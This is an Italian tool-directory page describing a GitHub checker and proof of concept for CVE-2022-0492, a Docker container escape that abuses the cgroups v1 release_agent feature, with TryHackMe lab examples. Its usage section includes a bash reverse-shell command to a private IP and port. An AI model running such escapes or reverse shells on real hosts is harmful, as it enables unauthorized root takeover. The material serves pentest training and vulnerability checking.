Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-0492-Docker-Breakout-Checker-and-PoC — Checker di breakout Docker e PoC tramite CAP_SYS_ADMIN e namespace utente (CVE-2022-0492) | Kitploit
Strumenti/GitHubGitHub/t1erno/cve-2022-0492-docker-breakout-checker-and-poc
Escalation di PrivilegiSicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza CloudApprendimento e FormazioneEscape dal ContainerLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubt1erno/cve-2022-0492-docker-breakout-checker-and-poc

CVE-2022-0492-Docker-Breakout-Checker-and-PoC

Checker di breakout Docker e PoC tramite CAP_SYS_ADMIN e namespace utente (CVE-2022-0492)

Vedi Repository
813 anni faNon ancora revisionato

CVE-2022-0492 Docker Breakout Checker e PoC

Sommario

Sfruttare la vulnerabilità richiede che l'attaccante abbia accesso a un container Docker in esecuzione su un sistema vulnerabile. Una volta sfruttata, l'attaccante può sfuggire dal container e ottenere il controllo completo del sistema host.

È stata trovata una vulnerabilità nella funzione cgroup_release_agent_write del kernel Linux, nel file kernel/cgroup/cgroup-v1.c. Questo difetto, in determinate circostanze, consente l'uso della funzionalità release_agent di cgroups v1 per aumentare i privilegi e bypassare l'isolamento dei namespace in modo imprevisto.

In parole più semplici, cgroups v1 ha una funzionalità chiamata release_agent che esegue un programma quando un processo nel cgroup termina. Se notify_on_release è abilitato, il kernel esegue il binario release_agent come root. Modificando il file release_agent, un attaccante può eseguire il proprio binario con privilegi elevati, prendendo il controllo del sistema. Tuttavia, il file release_agent è di proprietà di root, quindi solo un utente con accesso root può modificarlo.

Utilizzo

root@kitploit:~
# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Esegui questo script in un Docker per verificare la vulnerabilità o sfruttarla. (º___\/{
[>] Utilizzo:
        sh CVE-2022-0492.sh    --checker                Verifica se il sistema è vulnerabile.
        sh CVE-2022-0492.sh -c|--command <COMANDO>      Esegue il comando sulla macchina host.
        sh CVE-2022-0492.sh -h|--help                   Stampa il pannello di aiuto.

[>] Esempio:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

Esempi

Hamlet da TryHackMe

Utente root sulla macchina host compromesso disabilitando UFW e poi inviata una reverse shell.

Misguided Ghosts da TryHackMe

Utente root sulla macchina host compromesso impostando SUID a bash, inviata anche una reverse shell.

Fonti:

  • https://github.com/puckiestyle/CVE-2022-0492
  • http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
Scarica lo strumento